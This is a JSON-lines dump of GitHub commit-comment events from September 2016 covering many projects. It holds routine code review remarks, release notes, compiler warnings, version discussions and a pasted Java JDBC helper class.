{"id":"4546300713","type":"CommitCommentEvent","actor":{"login":"erinl1"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977725,"position":null,"line":null,"path":null,"commit_id":"d04d67893113f6a7ed5f7865455ac6b39a56fa8c","created_at":"2016-09-11T18:44:36Z","updated_at":"2016-09-11T18:44:36Z","body":"@rickyc is it possible to do userpass_(1 + x) = \r\n\r\nand then user.push(userpass_(1+x)  ?\r\n"}},"created_at":"2016-09-11T18:44:36Z"}
{"id":"4546300728","type":"CommitCommentEvent","actor":{"login":"ANixon"},"repo":{"name":"BigBenMOTO/DesolationREDUX"},"payload":{"comment":{"id":18977726,"position":null,"line":null,"path":null,"commit_id":"ddf2b9323ec7a63fa86f6f36e809e93aa184f4ed","created_at":"2016-09-11T18:44:37Z","updated_at":"2016-09-11T18:44:37Z","body":"Line 117 has an extra `};` \"Server Files/@DesolationServer/Addons/Desolation/config.cpp\" ;)"}},"created_at":"2016-09-11T18:44:37Z"}
{"id":"4546302893","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18977727,"position":null,"line":null,"path":null,"commit_id":"aa5767cccfc508a122183a84c746047a679b9c08","created_at":"2016-09-11T18:46:10Z","updated_at":"2016-09-11T18:46:10Z","body":"Also see [Release Versioning | Post-Release Increment](http://cryptopp.com/wiki/Release_Versioning#Post-Release_Increment) on the Crypto++ wiki; and [Post-release version number increment](http://groups.google.com/forum/#!topic/cryptopp-users/SFhqLDTQPG4) on the user list.\r\n\r\nThe manual points to [Crypto++ 5.6.4 generated docs](http://www.cryptopp.com/docs/ref/) at http://www.cryptopp.com/docs/ref/ because that's the current release. [Crypto++ Library 5.6.5 API Reference](http://www.cryptopp.com/docs/ref565/index.html) (work in progress) can be found at http://www.cryptopp.com/docs/ref565/."}},"created_at":"2016-09-11T18:46:10Z"}
{"id":"4546302918","type":"CommitCommentEvent","actor":{"login":"Fabricio20"},"repo":{"name":"DV8FromTheWorld/JDA-Player"},"payload":{"comment":{"id":18977728,"position":null,"line":null,"path":null,"commit_id":"475f610dedb9a4607a73dbedf26c9c72ac0b37ca","created_at":"2016-09-11T18:46:11Z","updated_at":"2016-09-11T18:46:11Z","body":"FINALLY :heart: \r\nNow we just have to deal with the threads...."}},"created_at":"2016-09-11T18:46:11Z"}
{"id":"4546303089","type":"CommitCommentEvent","actor":{"login":"RoyXue812"},"repo":{"name":"libapp/libapp"},"payload":{"comment":{"id":18977729,"position":21,"line":21,"path":"db/schema.rb","commit_id":"9b65cfa3626532a11d9d13ddf47dc1f4c2be424e","created_at":"2016-09-11T18:46:17Z","updated_at":"2016-09-11T18:46:17Z","body":"default/deleted"}},"created_at":"2016-09-11T18:46:17Z"}
{"id":"4546303692","type":"CommitCommentEvent","actor":{"login":"RoyXue812"},"repo":{"name":"libapp/libapp"},"payload":{"comment":{"id":18977730,"position":20,"line":20,"path":"db/schema.rb","commit_id":"9b65cfa3626532a11d9d13ddf47dc1f4c2be424e","created_at":"2016-09-11T18:46:42Z","updated_at":"2016-09-11T18:46:42Z","body":"0:preconfigured\r\n1 :normal"}},"created_at":"2016-09-11T18:46:42Z"}
{"id":"4546303843","type":"CommitCommentEvent","actor":{"login":"rchatterjee"},"repo":{"name":"rchatterjee/pam-typopw"},"payload":{"comment":{"id":18977732,"position":24,"line":128,"path":"test_typo_db_access.py","commit_id":"bcf795daad0258b02a845d6c8bd150ee68d8606c","created_at":"2016-09-11T18:46:49Z","updated_at":"2016-09-11T18:46:49Z","body":"Give space between arithmetic and logical operator. The code looks better."}},"created_at":"2016-09-11T18:46:49Z"}
{"id":"4546303880","type":"CommitCommentEvent","actor":{"login":"learningit"},"repo":{"name":"Frikanalen/repo-plugins"},"payload":{"comment":{"id":18977733,"position":null,"line":null,"path":null,"commit_id":"a3d94c246ee068e87b8fee291b569d578875b772","created_at":"2016-09-11T18:46:50Z","updated_at":"2016-09-11T18:46:50Z","body":"I tend to agree with Phil65 on this, but anyway at a minimum you need to set the listitem as playable and the mediatype info label."}},"created_at":"2016-09-11T18:46:50Z"}
{"id":"4546304226","type":"CommitCommentEvent","actor":{"login":"Faithcaio"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":18977734,"position":null,"line":null,"path":null,"commit_id":"c0c95f81d6d11fa47488bcfd77396bb95b470bdc","created_at":"2016-09-11T18:47:05Z","updated_at":"2016-09-11T18:47:05Z","body":"just an hour ago^^\r\ngotta finish those inventories"}},"created_at":"2016-09-11T18:47:05Z"}
{"id":"4546304419","type":"CommitCommentEvent","actor":{"login":"RoyXue812"},"repo":{"name":"libapp/libapp"},"payload":{"comment":{"id":18977735,"position":19,"line":19,"path":"db/schema.rb","commit_id":"9b65cfa3626532a11d9d13ddf47dc1f4c2be424e","created_at":"2016-09-11T18:47:13Z","updated_at":"2016-09-11T18:47:13Z","body":"encrypt"}},"created_at":"2016-09-11T18:47:13Z"}
{"id":"4546305411","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18977736,"position":null,"line":null,"path":null,"commit_id":"b779fbc9434e1fd05fcb9c7d3b13dd751cec5a6c","created_at":"2016-09-11T18:47:49Z","updated_at":"2016-09-11T18:47:49Z","body":"Pre-release preparation for Crypto++ 5.6.4."}},"created_at":"2016-09-11T18:47:49Z"}
{"id":"4546306129","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18977737,"position":null,"line":null,"path":null,"commit_id":"3074541e92a1c3e482b28202cc7781c6a72e8da9","created_at":"2016-09-11T18:48:19Z","updated_at":"2016-09-11T18:48:19Z","body":"Pre-release preparation for Crypto++ 5.6.4."}},"created_at":"2016-09-11T18:48:19Z"}
{"id":"4546306888","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18977739,"position":null,"line":null,"path":null,"commit_id":"c3ed76f4304aa14638f71f4f157a84b3d22de861","created_at":"2016-09-11T18:48:51Z","updated_at":"2016-09-11T18:48:51Z","body":"You can use functional as call backs. Functional isnt labeled as c++11"}},"created_at":"2016-09-11T18:48:51Z"}
{"id":"4546307649","type":"CommitCommentEvent","actor":{"login":"zaps166"},"repo":{"name":"reagentoo/gentoo-overlay"},"payload":{"comment":{"id":18977740,"position":null,"line":null,"path":null,"commit_id":"7c26fe65704af197d6ff984683933ead243dccb6","created_at":"2016-09-11T18:49:23Z","updated_at":"2016-09-11T18:49:23Z","body":"QMPlay2 doesn't use `QtNetwork` since v16.09.04.\r\nAlso it doesn't use `QtScript` for a few years :)"}},"created_at":"2016-09-11T18:49:23Z"}
{"id":"4546308413","type":"CommitCommentEvent","actor":{"login":"blackcoder87"},"repo":{"name":"IlchCMS/Ilch-2.0"},"payload":{"comment":{"id":18977741,"position":31,"line":102,"path":"application/modules/admin/mappers/Module.php","commit_id":"56c65603b330ef96ede40891fb5d38a3402f9e0e","created_at":"2016-09-11T18:49:56Z","updated_at":"2016-09-11T18:49:56Z","body":"Wieso diese Funktion, wenn man auch direkt extension_loaded() aufrufen könnte?"}},"created_at":"2016-09-11T18:49:56Z"}
{"id":"4546308897","type":"CommitCommentEvent","actor":{"login":"RoyXue812"},"repo":{"name":"libapp/libapp"},"payload":{"comment":{"id":18977742,"position":7,"line":7,"path":"db/migrate/20160909175501_create_rooms.rb","commit_id":"9b65cfa3626532a11d9d13ddf47dc1f4c2be424e","created_at":"2016-09-11T18:50:14Z","updated_at":"2016-09-11T18:50:14Z","body":"0:available/1:busy/2:deleted"}},"created_at":"2016-09-11T18:50:14Z"}
{"id":"4546311011","type":"CommitCommentEvent","actor":{"login":"kveldscholten"},"repo":{"name":"IlchCMS/Ilch-2.0"},"payload":{"comment":{"id":18977744,"position":31,"line":102,"path":"application/modules/admin/mappers/Module.php","commit_id":"56c65603b330ef96ede40891fb5d38a3402f9e0e","created_at":"2016-09-11T18:51:39Z","updated_at":"2016-09-11T18:51:39Z","body":"Hatte ich am Anfang direkt in der View aber dachte da gehört es nicht hin?"}},"created_at":"2016-09-11T18:51:39Z"}
{"id":"4546315826","type":"CommitCommentEvent","actor":{"login":"nalimilan"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18977746,"position":4,"line":286,"path":"README.md","commit_id":"046c6eb7f896d806de3fc38da2e8c9153b2dba39","created_at":"2016-09-11T18:54:52Z","updated_at":"2016-09-11T18:54:52Z","body":"If we don't know, better not list anything. I would think curl is a pretty stable tool and any reasonably recent version will do.\r\n\r\nThe only way to find out would to to try with `USE_SYSTEM_CURL=1` on a very old distro like RHEL5."}},"created_at":"2016-09-11T18:54:52Z"}
{"id":"4546317540","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":18977747,"position":null,"line":null,"path":null,"commit_id":"b90679aab7ae1ae2ee54353c5a1ba89469e5d79a","created_at":"2016-09-11T18:55:51Z","updated_at":"2016-09-11T18:55:51Z","body":"Just to notify the next release:\r\n@atweiden (AUR), @zmwangx (Homebrew)"}},"created_at":"2016-09-11T18:55:51Z"}
{"id":"4546319200","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18977749,"position":null,"line":null,"path":null,"commit_id":"37e828c3e016d9c7105e22da76123017a2cdff48","created_at":"2016-09-11T18:57:05Z","updated_at":"2016-09-11T18:57:05Z","body":"It may be more in relation of the fix in Bih. I need to double check that but i didnt noticed those eror on my system."}},"created_at":"2016-09-11T18:57:05Z"}
{"id":"4546321226","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":18977751,"position":null,"line":null,"path":null,"commit_id":"b90679aab7ae1ae2ee54353c5a1ba89469e5d79a","created_at":"2016-09-11T18:58:25Z","updated_at":"2016-09-11T18:58:25Z","body":"https://github.com/Homebrew/homebrew-core/pull/4726\r\n"}},"created_at":"2016-09-11T18:58:25Z"}
{"id":"4546321366","type":"CommitCommentEvent","actor":{"login":"hkrist"},"repo":{"name":"ngergo/ratatoskr"},"payload":{"comment":{"id":18977752,"position":null,"line":null,"path":null,"commit_id":"799372e1d41d4a390a63cad5a73b42018915f3a8","created_at":"2016-09-11T18:58:32Z","updated_at":"2016-09-11T18:58:32Z","body":"How about making the NoAuthorizer as a default constructor parameter for OperationWrapper. Authorizers wont be changed for registered operations anyways, so this would free up some of the code this commit includes, e.g. functions: load_authorizer, unload_authorizer, has_authorizer, and the conditional statements at the place where these called."}},"created_at":"2016-09-11T18:58:32Z"}
{"id":"4546321603","type":"CommitCommentEvent","actor":{"login":"socmag"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977755,"position":null,"line":null,"path":null,"commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T18:58:42Z","updated_at":"2016-09-11T18:58:42Z","body":"nvm i found it... throughput numberOfConnections payloadByteSize\nframesPerSend port\n\nOn Sun, Sep 11, 2016 at 8:09 PM, Christian Beaumont <\nchris@socialmagnetics.com> wrote:\n\n> It's all integrated and working on my end.  Not seeing any issues so far.\n>\n> thanks Alex and everyone that put this release together\n>\n> oh by the way, what are these numbers here:\n>\n> Throughput: \"*1, 20, 2000, 3000*\" - just to be clear\n>\n> On Sun, Sep 11, 2016 at 3:45 PM, Alex Hultman <notifications@github.com>\n> wrote:\n>\n>> This commit increases Node.js performance by about 100% in throughput:\n>>\n>> Throughput: 20k, 20, 10, 3000:\n>>\n>> Node.js (before): 300 echoes/ms\n>> Node.js (now): 570 echoes/ms\n>> C++: 1100 echoes/ms\n>>\n>> Throughput: 1, 20, 2000, 3000:\n>>\n>> Node.js (before): 450 echoes/ms\n>> Node.js (now): 1000 echoes/ms\n>> C++: about 5000 echoes/ms (don't care to remember)\n>>\n>> @lpinca <https://github.com/lpinca> This will break the Primus\n>> transformer, and might break your app if you expect to receive binary data\n>> as Node.js Buffer. All binary data is now ArrayBuffer which can be wrapped\n>> into a Node.js Buffer or any TypedArray like Uint8Array, etc.\n>>\n>> —\n>> You are receiving this because you are subscribed to this thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/uWebSockets/uWebSockets/commit/56abcced914497e1fc4fe24304b86564bc4aca8d#commitcomment-18977022>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AGQZ0oSGsrC0f5t8nKgeGNWGWsubuetIks5qpAYGgaJpZM4J6Ao6>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-11T18:58:42Z"}
{"id":"4546321815","type":"CommitCommentEvent","actor":{"login":"evolution23"},"repo":{"name":"jitsi/otr4j"},"payload":{"comment":{"id":18977756,"position":6,"line":36,"path":"pom.xml","commit_id":"73539543708b9808929a0e78350849bf2ff470ee","created_at":"2016-09-11T18:58:52Z","updated_at":"2016-09-11T18:58:52Z","body":"36"}},"created_at":"2016-09-11T18:58:52Z"}
{"id":"4546322370","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":18977757,"position":null,"line":null,"path":null,"commit_id":"b90679aab7ae1ae2ee54353c5a1ba89469e5d79a","created_at":"2016-09-11T18:59:09Z","updated_at":"2016-09-11T18:59:09Z","body":"Thank you!"}},"created_at":"2016-09-11T18:59:09Z"}
{"id":"4546322471","type":"CommitCommentEvent","actor":{"login":"evolution23"},"repo":{"name":"jitsi/otr4j"},"payload":{"comment":{"id":18977758,"position":7,"line":37,"path":"pom.xml","commit_id":"73539543708b9808929a0e78350849bf2ff470ee","created_at":"2016-09-11T18:59:11Z","updated_at":"2016-09-11T18:59:11Z","body":"37"}},"created_at":"2016-09-11T18:59:11Z"}
{"id":"4546323190","type":"CommitCommentEvent","actor":{"login":"grimreaper"},"repo":{"name":"oswetto/Loboevolution"},"payload":{"comment":{"id":18977759,"position":5,"line":8,"path":"Testing/src/main/java/org/lobobrowser/cobra_testing/AttributesTest.java","commit_id":"22e640e0c4dcb0a91738521dc68a873685bcd804","created_at":"2016-09-11T18:59:32Z","updated_at":"2016-09-11T18:59:32Z","body":"is it possible to keep this project as GPLv2? I'd like to use this in my project but we can't with the license change :("}},"created_at":"2016-09-11T18:59:32Z"}
{"id":"4546323630","type":"CommitCommentEvent","actor":{"login":"JanuszHain"},"repo":{"name":"JanuszHain/SocialMediaWatcher"},"payload":{"comment":{"id":18977760,"position":null,"line":null,"path":null,"commit_id":"2e4236902cd88e5b7477495b1717ec89d1b216f7","created_at":"2016-09-11T18:59:48Z","updated_at":"2016-09-11T18:59:48Z","body":"Added parallel tweet loading, changed app name and some other tweaks"}},"created_at":"2016-09-11T18:59:48Z"}
{"id":"4546323982","type":"CommitCommentEvent","actor":{"login":"evolution23"},"repo":{"name":"jitsi/otr4j"},"payload":{"comment":{"id":18977761,"position":3,"line":2,"path":"src/main/java/net/java/otr4j/OtrEngineHost.java","commit_id":"73539543708b9808929a0e78350849bf2ff470ee","created_at":"2016-09-11T19:00:04Z","updated_at":"2016-09-11T19:00:04Z","body":"2"}},"created_at":"2016-09-11T19:00:04Z"}
{"id":"4546325386","type":"CommitCommentEvent","actor":{"login":"PandemicMoon"},"repo":{"name":"AvalancheRobotics/Avalanche-2017"},"payload":{"comment":{"id":18977763,"position":null,"line":null,"path":null,"commit_id":"e1ed1665b38cb701fddbad658bb94b5d2dedabed","created_at":"2016-09-11T19:00:53Z","updated_at":"2016-09-11T19:00:53Z","body":"Meant excess not access. Proof-read your commit messages, kids."}},"created_at":"2016-09-11T19:00:53Z"}
{"id":"4546325933","type":"CommitCommentEvent","actor":{"login":"evolution23"},"repo":{"name":"jitsi/otr4j"},"payload":{"comment":{"id":18977764,"position":4,"line":36,"path":"pom.xml","commit_id":"73539543708b9808929a0e78350849bf2ff470ee","created_at":"2016-09-11T19:01:15Z","updated_at":"2016-09-11T19:01:15Z","body":"2.0"}},"created_at":"2016-09-11T19:01:15Z"}
{"id":"4546326916","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18977765,"position":27,"line":27,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T19:01:59Z","updated_at":"2016-09-11T19:01:59Z","body":"Yes, you are right. I was thinking that it might be annoying to convert real to int explicitly, but it is safer to use Integer. I will accept your suggestion:)"}},"created_at":"2016-09-11T19:01:59Z"}
{"id":"4546327442","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18977766,"position":32,"line":32,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T19:02:22Z","updated_at":"2016-09-11T19:02:22Z","body":"OK."}},"created_at":"2016-09-11T19:02:22Z"}
{"id":"4546327620","type":"CommitCommentEvent","actor":{"login":"ViralBShah"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18977768,"position":4,"line":286,"path":"README.md","commit_id":"046c6eb7f896d806de3fc38da2e8c9153b2dba39","created_at":"2016-09-11T19:02:29Z","updated_at":"2016-09-11T19:02:29Z","body":"I am ok. @tkelman ?"}},"created_at":"2016-09-11T19:02:29Z"}
{"id":"4546327762","type":"CommitCommentEvent","actor":{"login":"evolution23"},"repo":{"name":"jitsi/otr4j"},"payload":{"comment":{"id":18977770,"position":2,"line":2,"path":"src/main/java/net/java/otr4j/OtrEngineHost.java","commit_id":"73539543708b9808929a0e78350849bf2ff470ee","created_at":"2016-09-11T19:02:35Z","updated_at":"2016-09-11T19:02:35Z","body":"Copyright @ 2015 Atlassian Pty Ltd"}},"created_at":"2016-09-11T19:02:35Z"}
{"id":"4546331601","type":"CommitCommentEvent","actor":{"login":"blackcoder87"},"repo":{"name":"IlchCMS/Ilch-2.0"},"payload":{"comment":{"id":18977780,"position":31,"line":102,"path":"application/modules/admin/mappers/Module.php","commit_id":"56c65603b330ef96ede40891fb5d38a3402f9e0e","created_at":"2016-09-11T19:05:05Z","updated_at":"2016-09-11T19:05:05Z","body":"Finde das macht keinen Unterschied außer das die getLoadedPHPExtensions() jetzt unnötiger Code ist. Ich würde bei den Aufrufern dieser Funktion stattdessen extension_loaded() aufrufen.\r\n"}},"created_at":"2016-09-11T19:05:05Z"}
{"id":"4546334807","type":"CommitCommentEvent","actor":{"login":"hanjoosten"},"repo":{"name":"AmpersandTarski/Ampersand"},"payload":{"comment":{"id":18977792,"position":4,"line":398,"path":"src/Ampersand/ADL1/P2A_Converters.hs","commit_id":"7617f848e6dc0fc00113d13fcf5240681b1e48dd","created_at":"2016-09-11T19:07:06Z","updated_at":"2016-09-11T19:07:06Z","body":"Hoi Bas,\r\nKan je ook uitleggen waaróm dit zo zou moeten zijn? het specifieke concept in een PGen is toch niet generiek? En als dit goed is, waarom in P_Cy dan niet??"}},"created_at":"2016-09-11T19:07:06Z"}
{"id":"4546335162","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18977793,"position":4,"line":286,"path":"README.md","commit_id":"046c6eb7f896d806de3fc38da2e8c9153b2dba39","created_at":"2016-09-11T19:07:19Z","updated_at":"2016-09-11T19:07:19Z","body":"when building from source we need a curl new enough to build against mbedtls. when using system curl, need whatever minimum libgit2 assumes"}},"created_at":"2016-09-11T19:07:19Z"}
{"id":"4546335772","type":"CommitCommentEvent","actor":{"login":"hanjoosten"},"repo":{"name":"AmpersandTarski/Ampersand"},"payload":{"comment":{"id":18977794,"position":4,"line":398,"path":"src/Ampersand/ADL1/P2A_Converters.hs","commit_id":"7617f848e6dc0fc00113d13fcf5240681b1e48dd","created_at":"2016-09-11T19:07:44Z","updated_at":"2016-09-11T19:07:44Z","body":"@sjcjoosten "}},"created_at":"2016-09-11T19:07:44Z"}
{"id":"4546336031","type":"CommitCommentEvent","actor":{"login":"nidico100"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18977796,"position":null,"line":null,"path":null,"commit_id":"8af00ef28429a8751e0ad619dbf5e7e278b28087","created_at":"2016-09-11T19:07:56Z","updated_at":"2016-09-11T19:07:56Z","body":"can't getting it fixed, can anyone help me?\r\n"}},"created_at":"2016-09-11T19:07:56Z"}
{"id":"4546337074","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18977798,"position":null,"line":null,"path":null,"commit_id":"001ecef2ef55b335278c0fb5e0e3fae9be8b29af","created_at":"2016-09-11T19:08:36Z","updated_at":"2016-09-11T19:08:36Z","body":"Still a few warnings to remove\r\n\r\n./src/iohumdrum.cpp:2563:53: Implicit conversion loses integer precision: 'unsigned long' to 'value_type' (aka 'int')\r\n./src/iohumdrum.cpp:2747:40: Implicit conversion loses integer precision: 'unsigned long' to 'int'\r\n./src/iohumdrum.cpp:3171:35: Implicit conversion loses integer precision: 'unsigned long' to 'int'\r\n./src/iohumdrum.cpp:3345:35: Implicit conversion loses integer precision: 'unsigned long' to 'int'\r\n./src/iohumdrum.cpp:3492:39: Implicit conversion loses integer precision: 'unsigned long' to 'int'"}},"created_at":"2016-09-11T19:08:36Z"}
{"id":"4546338018","type":"CommitCommentEvent","actor":{"login":"minecrafter"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":18977799,"position":null,"line":null,"path":null,"commit_id":"7911d6c0856d68833ee90d3a02e89df35246eea5","created_at":"2016-09-11T19:09:13Z","updated_at":"2016-09-11T19:09:13Z","body":"In MCPE, there is no concept of \"right-clicking\" on a block."}},"created_at":"2016-09-11T19:09:13Z"}
{"id":"4546343080","type":"CommitCommentEvent","actor":{"login":"lorene-cn"},"repo":{"name":"lorene-cn/zarathustra-typeface"},"payload":{"comment":{"id":18977805,"position":19,"line":19,"path":"LICENSE.md","commit_id":"6caf1c01565b51237973eb820f48db08bf4c591c","created_at":"2016-09-11T19:12:35Z","updated_at":"2016-09-11T19:12:35Z","body":"[http://editions-b42.com/books/txt-2/](url)"}},"created_at":"2016-09-11T19:12:35Z"}
{"id":"4546343334","type":"CommitCommentEvent","actor":{"login":"kveldscholten"},"repo":{"name":"IlchCMS/Ilch-2.0"},"payload":{"comment":{"id":18977806,"position":31,"line":102,"path":"application/modules/admin/mappers/Module.php","commit_id":"56c65603b330ef96ede40891fb5d38a3402f9e0e","created_at":"2016-09-11T19:12:45Z","updated_at":"2016-09-11T19:12:45Z","body":"Meinetwegen können wir das machen "}},"created_at":"2016-09-11T19:12:45Z"}
{"id":"4546344954","type":"CommitCommentEvent","actor":{"login":"ViralBShah"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18977807,"position":4,"line":286,"path":"README.md","commit_id":"046c6eb7f896d806de3fc38da2e8c9153b2dba39","created_at":"2016-09-11T19:13:46Z","updated_at":"2016-09-11T19:13:46Z","body":"Looks like it should be 7.46.0 based on checking when mbedtls was introduced into curl.\r\n\r\nhttps://curl.haxx.se/changes.html"}},"created_at":"2016-09-11T19:13:46Z"}
{"id":"4546344992","type":"CommitCommentEvent","actor":{"login":"lorene-cn"},"repo":{"name":"lorene-cn/zarathustra-typeface"},"payload":{"comment":{"id":18977808,"position":19,"line":19,"path":"LICENSE.md","commit_id":"6caf1c01565b51237973eb820f48db08bf4c591c","created_at":"2016-09-11T19:13:48Z","updated_at":"2016-09-11T19:13:48Z","body":"To see more: http://editions-b42.com/books/txt-2/"}},"created_at":"2016-09-11T19:13:48Z"}
{"id":"4546345112","type":"CommitCommentEvent","actor":{"login":"CiDo91"},"repo":{"name":"CiDo91/hello-world"},"payload":{"comment":{"id":18977809,"position":null,"line":null,"path":null,"commit_id":"b8ec23d235c8cd9764d5fe644a27a79c3164bd9a","created_at":"2016-09-11T19:13:53Z","updated_at":"2016-09-11T19:13:53Z","body":"ddd"}},"created_at":"2016-09-11T19:13:53Z"}
{"id":"4546349961","type":"CommitCommentEvent","actor":{"login":"DNorell"},"repo":{"name":"IOOPM-UU/achievements"},"payload":{"comment":{"id":18977813,"position":null,"line":null,"path":null,"commit_id":"97e9ea230fbfdb0a88f4bfec2be78ef05c0d7b79","created_at":"2016-09-11T19:16:53Z","updated_at":"2016-09-11T19:16:53Z","body":"Jag antar att det ska stå \"Med\" istället för \"Men\" där det står \"Jag dör om jag inte får använda vim!\r\nDå är det ok. Men vim alltså.\" i beskrivningen av mål T55."}},"created_at":"2016-09-11T19:16:53Z"}
{"id":"4546352626","type":"CommitCommentEvent","actor":{"login":"marhyorh"},"repo":{"name":"stackPie/Stackpie"},"payload":{"comment":{"id":18977814,"position":null,"line":null,"path":null,"commit_id":"cbede863627197a05082fc96386726a3e53c1b45","created_at":"2016-09-11T19:18:28Z","updated_at":"2016-09-11T19:18:28Z","body":"For this to make a lot of sense, i had to do the following:\r\n\r\n- Make sure i'm searching provider id records of google cos' we might have other providers in the future\r\n- Changed Provider's id type to string cos' `Number(103407632382232544250)` coerces to `103407632382232540000` and we can't have that happening."}},"created_at":"2016-09-11T19:18:28Z"}
{"id":"4546353966","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18977815,"position":null,"line":null,"path":null,"commit_id":"001ecef2ef55b335278c0fb5e0e3fae9be8b29af","created_at":"2016-09-11T19:19:23Z","updated_at":"2016-09-11T19:19:23Z","body":"Fixed in commit https://github.com/rism-ch/verovio/commit/f875b46460be27073b02054f6439319178256795"}},"created_at":"2016-09-11T19:19:23Z"}
{"id":"4546357847","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/BackEnd"},"payload":{"comment":{"id":18977818,"position":null,"line":null,"path":null,"commit_id":"dd4618ac1ef9a59459baed50133f36a73926b396","created_at":"2016-09-11T19:21:58Z","updated_at":"2016-09-11T19:21:58Z","body":"Не понимаю, для чего нужен @RequestParam(\"update\") Object update ?\r\nВ каком случае мы можем не зайти в это условие?\r\n if(update != null){\r\n"}},"created_at":"2016-09-11T19:21:58Z"}
{"id":"4546359362","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18977819,"position":null,"line":null,"path":null,"commit_id":"37e828c3e016d9c7105e22da76123017a2cdff48","created_at":"2016-09-11T19:23:00Z","updated_at":"2016-09-11T19:23:00Z","body":"I am not getting these. Maybe it was in relation to what you was doing on the server? Could you give a bit more detail?"}},"created_at":"2016-09-11T19:23:00Z"}
{"id":"4546360405","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18977820,"position":32,"line":32,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T19:23:40Z","updated_at":"2016-09-11T19:23:40Z","body":"I think  `res[i,j] = x[ind]` should be good, no need to calculate the `ix`, right?\r\nI compared it with reshape then transpose and I found the latter approach is actually much faster.\r\n"}},"created_at":"2016-09-11T19:23:40Z"}
{"id":"4546362928","type":"CommitCommentEvent","actor":{"login":"EliasC"},"repo":{"name":"IOOPM-UU/achievements"},"payload":{"comment":{"id":18977821,"position":null,"line":null,"path":null,"commit_id":"97e9ea230fbfdb0a88f4bfec2be78ef05c0d7b79","created_at":"2016-09-11T19:25:21Z","updated_at":"2016-09-11T19:25:21Z","body":"@DNorell: Jag tolkar det som \"Men [då ska det vara] vim [och ingen annan editor] alltså\"."}},"created_at":"2016-09-11T19:25:21Z"}
{"id":"4546363133","type":"CommitCommentEvent","actor":{"login":"kutomanov"},"repo":{"name":"kutomanov/ksProgect"},"payload":{"comment":{"id":18977822,"position":1,"line":1,"path":"README.md","commit_id":"da36186ed5e14716133fad8e2ccd0c00e6294b49","created_at":"2016-09-11T19:25:29Z","updated_at":"2016-09-11T19:25:29Z","body":"package my.vaadin.university;\r\n\r\nimport java.sql.Connection;\r\nimport java.sql.DriverManager;\r\nimport java.sql.SQLException;\r\n\r\npublic class JBDC {\r\n\r\n\tprivate static final String DRIVER_CLASS = \"org.hsqldb.jdbcDriver\";\r\n\tprivate static Connection conn = null;\r\n\tprivate static String login = \"SA\";\r\n\tprivate static String password = \"\";\r\n\tprivate static String path = \"C:\\\\Users\\\\Евгения\\\\workspace\\\\university\\\\base\\\\test\";\r\n\tprivate static final String url = \"jdbc:hsqldb:file:\" + path + \";shutdown=true;hsqldb.write_delay=false; \";\r\n\t\r\n\t\r\n\tpublic static Connection connect() throws Exception{\r\n\t\tif (conn == null) {\r\n\t\t\ttry {\r\n\t\t\t\tClass.forName(DRIVER_CLASS);\r\n\t\t\t\t\r\n\t\t\t\tconn = DriverManager.getConnection(url, login, password);\r\n\t\t\t\t\r\n\t\t\t}\r\n\t\t\t\t\r\n\t\t\tcatch (ClassNotFoundException e) {\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t} catch (SQLException e) {\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t}\r\n\t\t}\r\n\t\t\r\n\t\treturn conn;\t\t\r\n\t}\r\n\t\r\n\tpublic static void closeConnection() {\r\n\t\ttry {\r\n\t\t\tconn.close();\r\n\t\t} catch (SQLException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t}\r\n\r\n\t\r\n}\r\n"}},"created_at":"2016-09-11T19:25:29Z"}
